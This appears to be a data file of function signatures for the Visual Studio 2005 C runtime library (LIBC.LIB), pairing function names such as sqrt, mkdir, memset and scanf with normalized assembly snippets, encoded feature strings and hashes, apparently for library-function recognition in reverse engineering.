+_sqrt,"LEA R32,DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPUSH R32\nWAIT\nFSTCW WORD PTR SS:[ESP]\nMOV R32,DWORD PTR SS:[ESP+CONST]\nJCC CONST",XqODJ9FIlKUAAAAAyNV7xOhVq9oR3zjEN9QtU9FIlKUAAAAA6FWr2pDioRHoVava2N0DXuhVq9qc7n8w6FWr2uhVq9oR3zjE6FWr2jfULVPNLBGm0UiUpSqzQt4qs0LeEd84xIp8rQWKfK0F0UiUpYp8rQWKfK0FzSwRpjfULVPoVavanO5/MOhVq9rI1XvE6FWr2pDioRHNLBGm6FWr2tFIlKWQ4qERKrNC3jBJ19gAAAAAzSwRppDioRFeo4MninytBehVq9oAAAAAMEnX2AAAAAAAAAAAkOKhESqzQt4qs0Le,[],807157b61d252c59a923c42107f48dc1ccc25cef,VS2005,LIBC.LIB
+__CIsqrt,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,vKBd6AAAAAAAAAAAAaF1swAAAAAAAAAAdqHX0LygXegBoXWz,18fa56abdc67cd83ef6c0d80e151d8503c69dc2a,VS2005,LIBC.LIB
+__mkdir,"PUSH R32\nCALL CONST\nPOP R32\nOR R32,CONST\nRETN",Us42lQAAAAAAAAAAlVAczHLoOkUAAAAAJu7hZXLoOkUAAAAAcug6RVLONpUIpA1ACKQNQAAAAAAAAAAAmort0Cbu4WWVUBzM,[],afc8aebdb04d561c2a41ffdcbeb265020898cc35,VS2005,LIBC.LIB
+__wexecvpe,"PUSH R32\nCALL CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nCALL CONST\nADD R32,R32\nPOP R32\nCMP R32,CONST",j2+4ZIs2Az2kKqSRwP+s1LXl4lDuvJZbpCqkkYs2Az0bLlt/l9dsyYs2Az3AM1YKGy5bfzdDw9XqMoS47ryWWxazdMLqMoS46jKEuDdDw9V1V5C6dVeQujdDw9VfanLE6jKEuLmb7qoWs3TCFrN0wrXl4lDqMoS4X2pyxBsuW38AAAAAwDNWCos2Az3AM1YK6jKEuLmb7qq15eJQN0PD1RHs5BPqMoS4teXiULmb7qqmdMRspnTEbBsuW3+5m+6qwDNWCos2Az1Sv4ec6jKEuBHs5BOgrviNoK74jRHs5BMAAAAAuZvuqos2Az0AAAAAUr+HnI9vuGQ6oDUkizYDPQAAAAAAAAAAOqA1JIs2Az2Pb7hkEezkE7mb7qrA/6zU,[],d16c3e160716ebc0d038d2dc7d33fe67b9254fe9,VS2005,LIBC.LIB
+__mbsnextc,"MOV R32,DWORD PTR SS:[ESP+CONST]\nXOR R32,R32\nMOVZX R32,BYTE PTR DS:[R32]\nTEST BYTE PTR DS:[R32+CONST],CONST\nJCC CONST",xmN6RevpqlrHjQf1x40H9evpqloAAAAA6+mqWgAAAAAAAAAA,[],748197addcc1024dc91df2e5697f496a7d055624,VS2005,LIBC.LIB
+__wmktemp,"PUSH CONST\nMOV R32,R32\nXOR R32,R32\nPOP R32\nDIV R32\nPUSH R32\nMOV R32,R32\nPOP R32",Dlb5dTlafGAAAAAAUr+HnAV1n4+doIgzaobLEjlafGAAAAAAJAPDnQ5W+XVC8KO2naCIM1K/h5wAAAAABXWfjybu4WW7tlwsJu7hZTlafGAAAAAAOVp8YAAAAAAAAAAAb1VkuFK/h5wAAAAAu7ZcLOlYYevODZAh6Vhh6ybu4WW7tlwsQvCjtmqGyxLx7sEgzg2QIQV1n48AAAAAhO7CdELwo7YkA8Odu7ZcLCbu4WVII8Ox8e7BIITuwnQAAAAASCPDsULwo7YkA8Od,[],9b7b46967d737e125fa91d704b7184bc251d170e,VS2005,LIBC.LIB
+__wfdopen,"MOV R32,R32\nPUSH CONST\nSAR R32,CONST\nAND R32,CONST\nPOP R32\nMOV R32,DWORD PTR DS:[R32*4]\nTEST BYTE PTR DS:[R32+R32*8+CONST],R8\nJCC CONST",l9p7lHLoOkW7tlwsu7ZcLHLoOkW7tlwsu7ZcLJyGUTheo4Mn623thibu4WVSaOpbXqODJw3MwAEAAAAAcug6RQ3MwAHN0OPMzdDjzJ7II7QAAAAAxAVusp7II7QAAAAAcug6RQ3MwAHN0OPMzdDjzJ7II7QAAAAAUmjqWybu4WVDuBfOnIZROA3MwAHEBW6yQ7gXzpZz8F+7tlws7o/vaO73PoMNzMABu7ZcLMQFbrK7tlwsDczAAZ7II7QAAAAAu7ZcLJZz8F8m7uFl7vc+g57II7QAAAAAJu7hZT/DesUAAAAAP8N6xQAAAAAAAAAAxAVusnP7P2AAAAAAQOmKnD/DesUAAAAAlnPwX3P7P2AAAAAAc/s/YJ7II7QAAAAAnsgjtEDpipxy6DpFcug6RUDpipwpAdvHKQHbx+6P72i7tlwsu7ZcLJyGUTiX2nuUoziUNSbu4WXrbe2G,[],8cd8f9a471056128d572657475a335d07b732892,VS2005,LIBC.LIB
+__wctime,"PUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nTEST R32,R32\nPOP R32\nJCC CONST",WrCX6FLONpViZtf8YmbX/AAAAAAAAAAAUs42lQAAAAAAAAAA,[],a411d0ce23bd9833f23fd3384a50738a09a0b720,VS2005,LIBC.LIB
+__strdate,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH R32",PzV3BAAAAAAAAAAA,[],adf4f315825044a4f5c2898811352246b38af69b,VS2005,LIBC.LIB
+_isalnum,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,JAPDnTCEIgCg/kmQoP5JkAAAAAAAAAAAMIQiAAAAAAAAAAAA,[],359db5c487eca9e51dc2ca1edb463d4fc08ad793,VS2005,LIBC.LIB
+___isascii,"CMP DWORD PTR SS:[ESP+CONST],CONST\nSBB R32,R32\nNEG R32\nRETN",T7PbHwAAAAAAAAAA,[],ff80288889a5d2c3707117e97f9256cc95737b75,VS2005,LIBC.LIB
+___toascii,"MOV R32,DWORD PTR SS:[ESP+CONST]\nAND R32,CONST\nRETN",/0BimwAAAAAAAAAA,[],8764c773f0dc48e8f79e45e1f666556ba92e6063,VS2005,LIBC.LIB
+_isprint,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,JAPDnTCEIgCg/kmQoP5JkAAAAAAAAAAAMIQiAAAAAAAAAAAA,[],139c8c7d1c591e51d8a1a189b672dcef5cb0d73d,VS2005,LIBC.LIB
+_iscntrl,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,vRc4sAAAAAAAAAAAJAPDnb0XOLBeCkgLXgpICwAAAAAAAAAA,[],e76a268e314154aa5aa26ca203f04be691cd4783,VS2005,LIBC.LIB
+___iscsymf,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nJMP SHORT CONST,AaF1swAAAAAAAAAAUg74tAAAAAAAAAAAul2CbHLoOkUAAAAAJAPDnbpdgmz//L8E//y/BHLoOkUAAAAAcug6RVIO+LTNLBGmzSwRplIO+LQBoXWz,[],e9f27e30036e53cad6ea7e0f6d8ef9d58d418bda,VS2005,LIBC.LIB
+___iscsym,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nJMP SHORT CONST,//y/BHLoOkUAAAAAcug6RVIO+LTNLBGmzSwRplIO+LQBoXWzAaF1swAAAAAAAAAAUg74tAAAAAAAAAAAul2CbHLoOkUAAAAAJAPDnbpdgmz//L8E,[],369f98d08a1f385fc7a15997c88d3304bad8b97d,VS2005,LIBC.LIB
+_ispunct,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,vRc4sAAAAAAAAAAAJAPDnb0XOLBeCkgLXgpICwAAAAAAAAAA,[],ce023333b6d2f5528e158d11dc00f51987693daa,VS2005,LIBC.LIB
+_islower,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,vRc4sAAAAAAAAAAAJAPDnb0XOLBeCkgLXgpICwAAAAAAAAAA,[],aff59c0a2af11cd72649623ea3b32947b860d056,VS2005,LIBC.LIB
+_isgraph,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,JAPDnTCEIgCg/kmQoP5JkAAAAAAAAAAAMIQiAAAAAAAAAAAA,[],6018d2889324e0e0c40a0f40a702a9285824ead5,VS2005,LIBC.LIB
+_isxdigit,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,JAPDne70z0ag/kmQoP5JkAAAAAAAAAAA7vTPRgAAAAAAAAAA,[],c94ef7ca13e3f453eec096871453e654ff6078e1,VS2005,LIBC.LIB
+_isdigit,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,vRc4sAAAAAAAAAAAJAPDnb0XOLBeCkgLXgpICwAAAAAAAAAA,[],1cf3cb5ea5cde8fcea0bb753e9fec736734e387c,VS2005,LIBC.LIB
+_isspace,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,vRc4sAAAAAAAAAAAJAPDnb0XOLBeCkgLXgpICwAAAAAAAAAA,[],67e348d3e50aab9afa4e6b8b9934f6518cccd241,VS2005,LIBC.LIB
+_isalpha,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,MIQiAAAAAAAAAAAAJAPDnTCEIgCg/kmQoP5JkAAAAAAAAAAA,[],4834c31dab78d80559a8a6df9db7f78488438e23,VS2005,LIBC.LIB
+_isupper,PUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN,vRc4sAAAAAAAAAAAJAPDnb0XOLBeCkgLXgpICwAAAAAAAAAA,[],282241a1530b8f39b5e3eac9163831e0987ff80d,VS2005,LIBC.LIB
+___mtold12,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nCMP R32,R32",ite05rshlPaSrIEcKrNC3rshlPYAAAAAkqyBHN8kwCcAAAAAuyGU9vPGmykR+NMu3yTAJ98kwCcwuXosEfjTLrshlPYAAAAAMLl6LLshlPYAAAAAuyGU9iqzQt7XLwGs1y8BrLshlPYAAAAA88abKQAAAAAAAAAA,[],cffa0ffd9fd04943fb34d8fd449065365dee462d,VS2005,LIBC.LIB
+___shl_12,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR DS:[R32]\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,R32\nADD R32,R32\nMOV DWORD PTR DS:[R32],R32",j5212QAAAAAAAAAA,[],9c3557c21e5be9fec8a27dfc0fc62418373c75b3,VS2005,LIBC.LIB
+___addl,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nXOR R32,R32\nLEA R32,DWORD PTR DS:[R32+R32]\nCMP R32,R32\nJCC CONST",WFl2n5G48BQAAAAADdyWUlhZdp9y6DpFkbjwFAAAAAAAAAAAcug6RZG48BRYWXaf,[],e1d0ac04e7ccde53bb632e8a2188890aea8be03d,VS2005,LIBC.LIB
+___shr_12,"MOV R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,R32\nMOV R32,R32\nSHL R32,CONST",Pit9MgAAAAAAAAAA,[],8f82c281d9911e48dc92b395c29d407fff19c234,VS2005,LIBC.LIB
+___add_12,"LEA R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nPUSH DWORD PTR DS:[R32+CONST]\nPUSH DWORD PTR DS:[R32]\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",bOeNceLW6afSLU8GQUXQGyLBilgAAAAAIsGKWAAAAAAAAAAAQUXQG+LW6acAAAAA4tbppyLBilhBRdAb0i1PBuLW6adBRdAb,[],61c5d01a04410be898d8fc6ecc39ccfe56edd8a5,VS2005,LIBC.LIB
+__strcmpi,"SUB R8,CONST\nCMP R8,CONST\nSBB R8,R8\nAND R8,CONST\nADD R8,R8\nADD R8,CONST\nXCHG R8,R8\nSUB R8,CONST",OtMlcLO2LAzfpJyg2M0EpiT076R8o2emd8zaekL41tYAAAAArfh6LdjNBKZL07VpQvjW1gAAAAAAAAAAKBITJ9jNBKZ3zNp6fKNnptjNBKYoEhMnJPTvpEL41tYAAAAAs7YsDNjNBKYAAAAAS9O1aST076QAAAAA36ScoNjNBKYAAAAAfKNnptjNBKat+Hot2M0EpkL41tZ8o2em,[],e9e765534c9af1cf5f477b12e6bfbe0fb3257f81,VS2005,LIBC.LIB
+__stricmp,"SUB R8,CONST\nCMP R8,CONST\nSBB R8,R8\nAND R8,CONST\nADD R8,R8\nADD R8,CONST\nXCHG R8,R8\nSUB R8,CONST",fKNnptjNBKat+Hotrfh6LdjNBKZL07Vps7YsDNjNBKYAAAAAfKNnptjNBKYoEhMn36ScoNjNBKYAAAAA2M0EpkL41tZ8o2em2M0EpiT076R8o2emOtMlcLO2LAzfpJygd8zaekL41tYAAAAAS9O1aST076QAAAAAQvjW1gAAAAAAAAAAKBITJ9jNBKZ3zNp6JPTvpEL41tYAAAAA,[],38328abc5c98b696b2d0f3a0f471bcaf4865b521,VS2005,LIBC.LIB
+__ismbstrail,"MOV R8,BYTE PTR DS:[R32]\nTEST R8,R8\nJCC CONST",Us42lQAAAAAAAAAAKeroSOj+gdAU4QRSJAPDnVLONpWFBAvCFOEEUpuQUPwUxIhqhQQLwpyGUTgAAAAAFMSIalLONpXo/oHQnIZROFLONpWP4s796P6B0JyGUTgAAAAAj+LO/VLONpUp6uhIm5BQ/AAAAAAAAAAA,[],68dcb22285c5b5922ba78407f3878fe87b70da50,VS2005,LIBC.LIB
+__openfile,"PUSH CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,R32\nADD ESP,CONST\nCMP R32,R32",KrNC3iSjmVwAAAAATmrDzmZ5MTUSfrxXJKOZXFhZdp8AAAAAWFl2nx3ZU6sAAAAAtN+0CmZ5MTVmeTE1HdlTq5kGtDSHo219ZnkxNR3ZU6sAAAAADczAAUL41tYAAAAAh6NtfZkGtDTOyr7l8+CCOEL41tYAAAAAu7ZcLFvQFeCX2nuUl9p7lLshlPa7tlwszsq+5bu2XCwhh3lju7ZcLLshlPa7tlwsu7ZcLGZ5MTVb0BXgIYd5Y7TftAq7tlwsu7ZcLFvQFeC7tlwsW9AV4GZ5MTVPQR6Qu7ZcLFvQFeC7tlwsT0EekB3ZU6sAAAAAQvjW1gAAAAAAAAAAu7ZcLE5qw85ikSysl3FRniSjmVwAAAAAuyGU9mZ5MTWapzl1mqc5dR3ZU6sAAAAATmrDzmZ5MTUSfrxX9KaieiqzQt7YzQSmEn68Vx3ZU6sAAAAAuyGU9mZ5MTWapzl1mqc5dR3ZU6sAAAAAYpEsrGZ5MTVOasPOEn68Vx3ZU6sAAAAAW9AV4E9BHpBmeTE1W9AV4GZ5MTXEkqZoLYZTng3MwAGXcVGeZnkxNR3ZU6sAAAAAxJKmaB3ZU6sAAAAA2M0EplIoILIthlOeT0EekB3ZU6sAAAAAW9AV4GZ5MTWIg2Q/iINkPx3ZU6sAAAAAUiggslhZdp8AAAAAmQa0NPPggjgNzMAB,[],fabac9e35acc2f67cd52f9fd9ce6979dccda5f55,VS2005,LIBC.LIB
+_ldiv,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCDQ\nIDIV DWORD PTR SS:[EBP+CONST]\nMOV R32,R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCDQ",9xjS7E+LzAoAAAAAcug6RU+LzAr3GNLsOHmGgE+LzApy6DpFT4vMCgAAAAAAAAAA,[],e9b28d407d62f1c8a31419eb3cb1de578fbfe1dc,VS2005,LIBC.LIB
+_localtime,"ADD R32,CONST\nMOV DWORD PTR DS:[R32+CONST],R32\nSUB DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH CONST\nCDQ\nIDIV R32\nPOP R32",ry9JmK38bdYAAAAArfxt1iGHeWND5BImqSvPjjKUIqfmG2yxWqCM9kxEkvpmeTE1IiKzgybu4WV9F3TTQ+QSJvh3+cEAAAAAZnkxNT/DesUAAAAA5htssTKUIqcAAAAATESS+qkrz47oVavaMpQip/0lmvtNfYyr+Hf5wSbu4WUAAAAA6FWr2qkrz44iIrODJu7hZT/DesUAAAAAP8N6xQAAAAAAAAAAIYd5Yybu4WUdGvKUHRrylPh3+cHl/dDrTX2Mq5e+PkqRcVSD/SWa+5e+PkqRcVSD5f3Q6ybu4WUAAAAAfRd00ybu4WU0i/7+kXFUg638bdavL0mYl74+Sq38bdavL0mYNIv+/ibu4WUAAAAA,[],daeca682f87d6dbfe32abfcab5132fa210af7708,VS2005,LIBC.LIB
+__execlp,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nPOP R32\nPOP R32\nRETN",NQ7aigAAAAAAAAAA,QuVyowAAAAAAAAAA,d39ac6c497fda8a05bf277df01157198633e4edf,VS2005,LIBC.LIB
+_memset,"XOR R32,R32\nMOV R8,BYTE PTR SS:[ESP+CONST]\nPUSH R32\nMOV R32,R32\nCMP R32,CONST\nJCC CONST",OxWXD7ygXejWrd87nnqiNkNQbiQFHO/vBRzv7wUc7+9AWZRKBRzv7wUc7+9DUG4kQFmUSgUc7++eeqI21q3fOwUc7+8tDNr2Q1BuJAAAAAAAAAAANtDESQUc7+9AWZRKvKBd6AAAAAAAAAAALQza9kBZlEo20MRJ,[],cfb1ed5619cbd5001985d41686d69711774fa5ca,VS2005,LIBC.LIB
+__woutput,"XOR R32,R32\nMOVSX R32,BYTE PTR DS:[R32+R32*8]\nPUSH CONST\nSAR R32,CONST\nPOP R32\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP R32,R32\nJCC CONST",c6IZYQAAAAAAAAAADczAAU5qw84AAAAA+zU5RnOiGWF/JnIcTmrDznOiGWF/JnIcPyBmRfs1OUZzohlhl8ArYz8gZkVINCO7TZA3jT8gZkVINCO7fyZyHJfAK2PqMoS4+rMY/02QN40AAAAA6jKEuJfAK2P6sxj/XZ7v8nOiGWENzMABSDQjuwAAAAAAAAAA,[],45161e59ef2ec41875583b74463c7bbe3ebed84a,VS2005,LIBC.LIB
+_scanf,"LEA R32,DWORD PTR SS:[ESP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nRETN",9LcAzQAAAAAAAAAA,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,VS2005,LIBC.LIB
+___set_app_type,"MOV R32,DWORD PTR SS:[ESP+CONST]\nMOV DWORD PTR DS:[0],R32\nRETN",7sGTZgAAAAAAAAAA,[],5e2d86072a94278eefb18ff7e3fb5968d526e846,VS2005,LIBC.LIB
+__set_error_mode,"MOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,R32\nJCC CONST",m5BQ/AAAAAAAAAAAu7ZcLAzFeqO7tlwsu7ZcLJuQUPwNwbnUDcG51AAAAAAAAAAADMV6owAAAAAAAAAAFjgIIpuQUPy7tlws,[],e9147361640d9dd9317bdca11c01e35027131b2e,VS2005,LIBC.LIB
+__open,"PUSH DWORD PTR SS:[ESP+CONST]\nPUSH CONST\nPUSH DWORD PTR SS:[ESP+CONST]\nPUSH DWORD PTR SS:[ESP+CONST]\nCALL CONST\nADD ESP,CONST\nRETN",8qdmRQAAAAAAAAAA,Jw91Eibu4WWq8S9YKxOjwlvQFeCmrZQN2M0EpicPdRInD3USFgnf2FQwF2Jb0BXg34KfB9jNBKbAfTo9rZF/ArAM10P0Ke4IxAVusvs/q2oAAAAAsnoJ1YU0ZeNmgpy72wdx79jNBKbAfTo99CnuCPs/q2oAAAAAtN+0ClQwF2Jb0BXgJu7hZUL41tYAAAAAQvjW1gAAAAAAAAAAgS+o0VjaKDohh3ljQGf/7ru2XCxvOBb/wH06PdjNBKYrE6PC+z+raljaKDohh3ljFaIxVlQwF2Juu82iZoKcuycPdRJeo4MnbzgW/2Z5MTUAAAAAhTRl4+ZdOmQnD3USW9AV4G67zaIVojFW9CnuCOcL35cAAAAA9swVIWZ5MTUAAAAAVDAXYk5+gqqX2nuU2M0EplvQFeCmrZQNXqODJ7mb7qoAAAAAqvEvWCbu4WUAAAAApq2UDdjNBKZOd4J8cug6RcQFbrJy6DpFcug6RfQp7ghY2ig6ZnkxNUL41tYAAAAAl9p7lPQp7giwDNdDWNooOvQp7gitkX8CW9AV4NjNBKZOd4J8sAzXQ8SSpmgAAAAAu7ZcLLu2XCxYK49WTneCfNjNBKYn/tJ+2M0EptjNBKYn/tJ+WCuPVrk6FFkAAAAA9CnuCNsHce8AAAAAJ/7SftMM6c4AAAAAJw91EuZdOmTiyiL0u7ZcLLk6FFngpU1nl9p7lPQp7giX2nuU4soi9Lmb7qr